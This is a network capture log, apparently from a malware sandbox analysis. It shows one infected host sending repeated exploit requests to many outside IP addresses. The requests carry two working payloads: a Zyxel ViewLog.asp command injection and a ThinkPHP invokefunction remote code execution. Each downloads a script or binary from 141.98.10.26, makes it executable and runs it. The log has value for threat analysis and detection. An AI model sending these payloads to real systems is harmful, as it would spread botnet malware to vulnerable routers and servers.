Nov 22, 2023 08:40:17.631293058 CET	17930	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
891	192.168.2.23	45576	94.122.67.0	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.648431063 CET	17931	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
892	192.168.2.23	56278	94.123.242.128	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.651556015 CET	17932	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
893	192.168.2.23	50526	94.122.68.51	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.652008057 CET	17932	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
894	192.168.2.23	32878	94.187.108.118	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.866162062 CET	17935	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
895	192.168.2.23	39676	31.200.60.202	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.009421110 CET	17938	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
896	192.168.2.23	57224	85.56.192.173	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.010189056 CET	17938	IN	HTTP/1.0 400 Bad Request Server: httpd Date: Wed, 22 Nov 2023 07:40:21 GMT Content-Type: text/html CONTENT-LANGUAGE: en Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
897	192.168.2.23	44606	88.150.241.148	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.230585098 CET	17969	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:18.399633884 CET	18031	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 22 Nov 2023 07:40:18 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
898	192.168.2.23	52248	95.100.184.182	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.403615952 CET	18032	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:18.576500893 CET	18039	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:18 GMT Date: Wed, 22 Nov 2023 07:40:18 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 38 26 23 34 36 3b 34 38 66 64 31 63 39 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.343e2217.1700638818.48fd1c9c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
899	192.168.2.23	37768	88.214.140.123	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.538619041 CET	18038	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:19.484522104 CET	18094	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:18 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
900	192.168.2.23	46408	95.101.179.134	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.579503059 CET	18040	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:18.759021997 CET	18068	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:18 GMT Date: Wed, 22 Nov 2023 07:40:18 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 38 26 23 34 36 3b 31 61 35 35 37 30 61 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a47a7b5c.1700638818.1a5570ab</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
901	192.168.2.23	34432	95.101.197.201	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.583343983 CET	18040	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:18.766807079 CET	18070	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:18 GMT Date: Wed, 22 Nov 2023 07:40:18 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 38 37 37 31 33 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 38 26 23 34 36 3b 34 39 31 31 34 66 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.18771302.1700638818.49114fef</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
902	192.168.2.23	49762	85.122.199.186	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.646333933 CET	18064	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
903	192.168.2.23	34288	94.121.78.245	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.650732994 CET	18065	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
904	192.168.2.23	45634	94.120.37.3	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.654673100 CET	18066	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
905	192.168.2.23	37410	94.123.250.40	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.654731989 CET	18066	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
906	192.168.2.23	39584	88.176.167.180	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.735553026 CET	18067	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
907	192.168.2.23	47994	88.114.206.22	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.745960951 CET	18068	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:19.246143103 CET	18091	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
908	192.168.2.23	38218	88.249.182.163	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.777805090 CET	18071	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
909	192.168.2.23	35852	31.136.209.157	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.831080914 CET	18072	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:19.390942097 CET	18093	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:20.510824919 CET	18226	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:22.782454014 CET	18536	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.389928102 CET	19072	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:36.348572969 CET	19758	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:56.058048964 CET	19776	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
910	192.168.2.23	43384	31.136.126.166	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.831967115 CET	18072	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
